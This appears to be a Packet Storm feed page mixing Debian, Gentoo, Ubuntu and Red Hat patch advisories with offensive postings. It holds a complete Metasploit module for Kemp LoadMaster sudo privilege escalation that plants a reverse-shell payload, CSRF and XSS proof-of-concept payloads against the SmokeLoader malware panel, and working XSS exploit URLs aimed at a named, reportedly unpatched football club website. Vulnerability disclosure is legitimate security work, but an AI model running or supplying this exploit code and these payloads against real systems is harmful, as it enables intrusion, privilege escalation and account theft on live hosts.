Debian Linux Security Advisory 5687-1 - A security issue was discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure. Google is aware that an exploit for CVE-2024-4671 exists in the wild.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5687-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonMay 10, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-4671A security issue was discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure. Google is aware that an exploit for CVE-2024-4671 existsin the wild.For the stable distribution (bookworm), this problem has been fixed inversion 124.0.6367.201-1~deb12u1.We highly recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmY+V2EACgkQZF0CR8Nudjc6KxAAmbOIpJDKJntYp1sgQdqm6PKSMYSnUWlcZXSAyJkhGPlkGiMyttmLD5X2CO3wk8R7bkV0SDZZPhN58+KKe6m0QjyI8QuXav47aQd+YePRkqweUDJYCMf9Wf3S3zte5tIloXwofTv0uW0ZXJ9WU0ADu9Q9PATK1121RVqD0a2js3H1z6nMTbOPn2S8QF/Khm9IdfihweaJA2MJYncsxTSZgFbVUIiVq2Zu3d1OfkJbtx/wgcZFo2+O9dcKsuR6p/PrhjujwUIw9cxyiTuU8D4FFEk86Lr52akM60dFJLiF6XPvGHdfb2BZ3ev2QTvRzA9msMNAWf+GlV3hed9S3+F866mOK0LRXBNlJvGtJFJRzFs0q5VrDM5hSEEa0c6tm8gw8id+NHcS8iXr/CHDP9w8nu0iJxtupA3jRTsNyLPu5kXRyATPMVjZtssVDz/TQSpnxFNaMWdCu9TxPs4/3kPEEu0HW8PbVV0rWaF5PvnT5JU/rEp6ho9Omx/fKzJPfjO4t/GxgZ7gcTm7QrRKI4W3VhNSn1kTvA15mndKm0YMNZfvD7tURytU7Qm0EGTzpNc4MScGKASZ8XRuygQnj9oCHegyu1el5BmCu/mbOLDr4neh1hDq3YDHIlkfTnv/txolKV9hFrQPdf/Wn/CA2f9Zw3HMWECCbYkVTvxak/+Nj0g==/LcI-----END PGP SIGNATURE-----

Debian Security Advisory 5687-1

This Metasploit module abuses a feature of the sudo command on Progress Kemp LoadMaster. Certain binary files are allowed to automatically elevate with the sudo command. This is based off of the file name. Some files have this permission are not write-protected from the default bal user. As such, if the file is overwritten with an arbitrary file, it will still auto-elevate. This module overwrites the /bin/loadkeys file with another executable.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  include Msf::Post::File  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kemp LoadMaster Local sudo privilege escalation',        'Description' => %q{          This module abuses a feature of the sudo command on Progress Kemp          LoadMaster.  Certain binary files are allowed to automatically elevate          with the sudo command.  This is based off of the file name.  Some files          have this permission are not write-protected from the default 'bal' user.          As such, if the file is overwritten with an arbitrary file, it will still          auto-elevate.  This module overwrites the /bin/loadkeys file with another          executable.        },        'Author' => [          'Dave Yesland with Rhino Security Labs',          'bwatters-r7' # module,        ],        'License' => MSF_LICENSE,        'References' => [          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']        ],        'DisclosureDate' => '2024-03-19',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [ REPEATABLE_SESSION ]        },        'SessionTypes' => ['shell', 'meterpreter'],        'Platform' => ['unix', 'linux'],        'Targets' => [          [            'Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'              }            }          ],          [            'Command',            {              'Arch' => [ARCH_CMD],              'Type' => :command,              'Payload' =>                {                  'BadChars' => "\x27",                  'Compat' =>                    {                      'PayloadType' => 'cmd',                      'RequiredCmd' => 'generic gawk telnet ssh echo'                    }                },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse'              }            }          ]        ],        'Privileged' => true      )    )    register_options([      OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ])    ])  end  def check    score = 0    score += 1 if read_file('/usr/wui/index.js').include?('KEMP')    score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')    score += 1 if exists?('/usr/wui/eula.kemp.html')    vprint_status("Found #{score} indicators this is a KEMP product")    return CheckCode::Detected if score > 0    return CheckCode::Safe  end  def verify_copy(src, dest, elevate)    orig_file_hash = file_remote_digestmd5(src)    vprint_status("Moving #{src} to #{dest}")    if elevate      output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'")    else      output = cmd_exec("/bin/cp '#{src}' '#{dest}'")    end    return true if file_remote_digestmd5(dest) == orig_file_hash    print_bad("Copy failed - #{output}")    false  end  def execute_dropper(target_binary, binary_rename, temp_payload_path)    vprint_status("Writing payload to #{temp_payload_path}")    write_file(temp_payload_path, generate_payload_exe)    chmod(temp_payload_path)    register_file_for_cleanup(temp_payload_path)    return unless verify_copy(target_binary, binary_rename, false)    return unless verify_copy(temp_payload_path, target_binary, true)    vprint_status("Running #{target_binary}")    cmd_exec("sudo '#{target_binary}'")  end  def execute_command(target_binary, binary_rename, cmd)    vprint_status('Preparing payload command')    # save copy of target_binary    return unless verify_copy(target_binary, binary_rename, false)    return unless verify_copy('/bin/bash', target_binary, true)    vprint_status('Running payload command')    vprint_status(cmd_exec("sudo #{target_binary} -c '#{cmd}'"))  end  def exploit    writable_dir = datastore['WRITABLE_DIR']    if writable_dir.blank? || (writable_dir[-1] != '/')      writable_dir += '/'    end    fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)    target_binary = datastore['TARGET_BINARY']    binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"    target_binary_hash = file_remote_digestmd5(target_binary)    begin      case target['Type']      when :dropper        temp_payload = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"        execute_dropper(target_binary, binary_rename, temp_payload)      when :command        execute_command(target_binary, binary_rename, payload.encoded)      end    ensure      unless target_binary_hash == file_remote_digestmd5(target_binary)        cmd_exec("sudo rm '#{target_binary}'")        verify_copy(binary_rename, target_binary, true)        cmd_exec("sudo rm '#{binary_rename}'")      end    end    if target_binary_hash == file_remote_digestmd5(target_binary)      print_good("#{target_binary} returned to original contents")    else      print_bad("#{target_binary} was not returned to original contents")    end  endend

Kemp LoadMaster Local sudo Privilege Escalation

Gentoo Linux Security Advisory 202405-33 - Multiple vulnerabilities have been discovered in PoDoFo, the worst of which could lead to code execution. Versions greater than or equal to 0.10.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-33  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: PoDoFo: Multiple Vulnerabilities  
     Date: May 12, 2024  
     Bugs: #906105  
       ID: 202405-33

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in PoDoFo, the worst of  
which could lead to code execution.

Background  
==========

PoDoFo is a free portable C++ library to work with the PDF file format.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
app-text/podofo  < 0.10.1      >= 0.10.1

Description  
===========

Please review the referenced CVE identifiers for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All PoDoFo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/podofo-0.10.1"

References  
==========

[ 1 ] CVE-2023-31566  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31566  
[ 2 ] CVE-2023-31567  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31567

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-33

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-33

Gentoo Linux Security Advisory 202405-32 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-32  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: May 12, 2024  
     Bugs: #925123, #926533, #930381  
       ID: 202405-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could lead to remote code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
mail-client/thunderbird      < 115.10.0    >= 115.10.0  
mail-client/thunderbird-bin  < 115.10.0    >= 115.10.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-115.10.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-115.10.0"

References  
==========

[ 1 ] CVE-2024-1546  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1546  
[ 2 ] CVE-2024-1547  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1547  
[ 3 ] CVE-2024-1548  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1548  
[ 4 ] CVE-2024-1549  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1549  
[ 5 ] CVE-2024-1550  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1550  
[ 6 ] CVE-2024-1551  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1551  
[ 7 ] CVE-2024-1552  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1552  
[ 8 ] CVE-2024-1553  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1553  
[ 9 ] CVE-2024-1936  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1936  
[ 10 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 11 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 12 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 13 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 14 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 15 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 16 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-32

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-32

Gentoo Linux Security Advisory 202405-31 - A vulnerability has been discovered in Kubelet, which can lead to privilege escalation. Versions greater than or equal to 1.28.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-31  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Kubelet: Privilege Escalation  
     Date: May 12, 2024  
     Bugs: #918665  
       ID: 202405-31

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Kubelet, which can lead to  
privilege escalation.

Background  
==========

Kubelet is a Kubernetes Node Agent.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
sys-cluster/kubelet  < 1.28.5      >= 1.28.5

Description  
===========

A vulnerability has been discovered in Kubelet. Please review the CVE  
identifier referenced below for details.

Impact  
======

A security issue was discovered in Kubernetes where a user that can  
create pods and persistent volumes on Windows nodes may be able to  
escalate to admin privileges on those nodes. Kubernetes clusters are  
only affected if they are using an in-tree storage plugin for Windows  
nodes.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Kubelet users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-cluster/kubelet-1.28.5"

References  
==========

[ 1 ] CVE-2023-5528  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5528

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-31

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-31

Ubuntu Security Notice 6771-1 - It was discovered that SQL parse incorrectly handled certain nested lists. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6771-1  
May 13, 2024

sqlparse vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS

Summary:

SQL parse could be made to denial of service if it received a specially crafted input.

Software Description:  
- sqlparse: documentation for non-validating SQL parser in Python

Details:

It was discovered that SQL parse incorrectly handled certain nested lists.  
An attacker could possibly use this issue to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-sqlparse                0.4.4-1ubuntu0.1

Ubuntu 23.10  
  python3-sqlparse                0.4.2-1ubuntu1.1

Ubuntu 22.04 LTS  
  python3-sqlparse                0.4.2-1ubuntu0.22.04.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6771-1  
  CVE-2024-4340

Package Information:  
  https://launchpad.net/ubuntu/+source/sqlparse/0.4.4-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/sqlparse/0.4.2-1ubuntu1.1  
  https://launchpad.net/ubuntu/+source/sqlparse/0.4.2-1ubuntu0.22.04.2

Ubuntu Security Notice USN-6771-1

Panel.SmokeLoader malware suffers from cross site request forgery, and cross site scripting vulnerabilities.

**Panel.SmokeLoader MVID-2024-0682 Cross Site Request Forgery / Cross Site Scripting**

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel.SmokeLoader Vulnerability: Cross Site Request Forgery (CSRF) - Persistent XSSFamily: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743Vuln ID: MVID-2024-0682Disclosure: The smokebot admin web panel is written in PHP for remote administration capability.The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM using POST method, however there is no CSRF security token used by the FORM. This is a unique token per session within the FORM, used as a challenge to the server to help prevent cross-site-scripting attacks. Therefore, third-party adversaries who can lure a panel user to visit an attacker controlled webpage or click an infected link may result in the panel users submitting FORMS on an attackers behalf. This may result in code execution, data theft, GEO location disclosure. The CSRF to XSS results in stored JS payload in the smoke MySQL database table "plugins".hash   fgfilter   fakedns_rules   filesearch_rules   procmon_rules   ddos_rules   keylog_rules   fgcookies   miner_rules   93666df0833e0b63917e5373812613               0   ""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/l...Exploit/PoC:1) CSRF to add your own Miner Pool%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3EPool: %3Cinput type="input" name="miner_pool" size="30" value="MyPoolFool:666"%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3EPassword: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E%3Cinput type="hidden" name="mode" value="miner"%3E%3Cinput type="submit" value="SAVE"%3E%3Cscript%3Edocument.forms[0].submit()%3C/script%3E%3C/form%3E2) CSRF to Persistent XSS%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3EPool: %3Cinput type="input" name="miner_pool" size="300" value='""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/log.php")%3C/script%3E"'%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3EPassword: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E%3Cinput type="hidden" name="mode" value="miner"%3E%3Cinput type="submit" value="SAVE"%3E%3Cscript%3Edocument.forms[0].submit()%3C/script%3E%3C/form%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel.SmokeLoader MVID-2024-0682 Cross Site Request Forgery / Cross Site Scripting

Panel.SmokeLoader malware suffers from a cross site scripting vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel.SmokeLoader Vulnerability: Cross Site Scripting (XSS)Family: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743Vuln ID: MVID-2024-0681Disclosure: 05/11/2024Description: The smokebot admin web panel is written in PHP for remote administration capability. The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM that uses $_SERVER["PHP_SELF"] for the form action method. This is a super global variable that returns the filename of the currently executing script. There is no secure coding practices of filtering input or sanitization of output e.g "htmlspecialchars()". Therefore, panel users who visit a third-party adversary website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the smokebot web interface.PHP snippet.if ($_GET["mode"] === "reports"){   $url_pattern = $_GET["logs_sru"];   $id_pattern = $_GET["logs_sri"];$action = $_SERVER["PHP_SELF"]."?page=stealer&mode=reports";%3Cform method=\"get\" action=\"{$action}\"%3EInterestingly, they use PHP function htmlspecialchars() when retrieving data from the "smoke bot" MySQL database.$r = mysqli_query($dbcon,"SELECT * FROM `stealer` WHERE `cname`='{$id}'");   while ($v = mysqli_fetch_assoc($r)){   $stealer_host = htmlspecialchars($v["host"]);However, it doesn't wrap $_SERVER["PHP_SELF"] on the action method for the FORM {$action} variable that handles user input.Exploit/PoC:1) http://x.x.x.x/SmokeLoader/control1.php?page=stealer&mode=reports&logs_sri=%22/%3E%3Cscript%3Ewindow.open("https://malvuln.com")%3C/script%3E&logs_sru=&next=12) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sri=%22/%3E%3Cscript%3Ealert((document.cookie)%3C/script%3E3) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sru=%22/%3E%3Cscript%3Ewindow.open('https://hyp3rlinx.altervista.org/')%3C/script%3E4) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_srd=%22/%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel.SmokeLoader MVID-2024-0681 Cross Site Scripting

Esteghlal F.C.'s site suffers from a cross site scripting vulnerability.

**Esteghlal F.C. Cross Site Scripting**

    EXPLOIT XSS Esteghlal F.C. (باشگاه فوتبال استقلال تهران) Sitehttps://fcesteghlal.ir   suffers from a remote XSS vulnerability.This security incident was reported by the SOC and Maher team and prevention centers and was ignoredthis site has not responded to their reports so we are posting this to add visibility to the issue.#################################################################################################### ##   Exploit Title : The Tehran Independence Club site, which is a government site "belonging to the government of the Islamic Republic of Iran", has an XSS INJECTION vulnerability.   ## ## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Portal Link :   https://fcesteghlal.ir/   ## ## Security Risk : high ## ## Description : All sites coded and designed by novinvision ## ## DorK : fcesteghlal.ir/search?term= ## ##################################################################################################### ## Expl0iTs:   https://fcesteghlal.ir/search?term=<img+src/onerror=prompt(8)>##   https://fcesteghlal.ir/search?term=<script>alert('Hacked+By+E1.Coders')</script>

Esteghlal F.C. Cross Site Scripting

Red Hat Security Advisory 2024-2822-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2822.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid:4 security updateAdvisory ID:        RHSA-2024:2822-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2822Issue date:         2024-05-13Revision:           03CVE Names:          CVE-2024-25111====================================================================Summary: An update for the squid:4 module is now available for Red Hat Enterprise Linux8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supportingFTP, and HTTP data objects.Security Fix(es):* Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-25111References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268366

Source

Packet Storm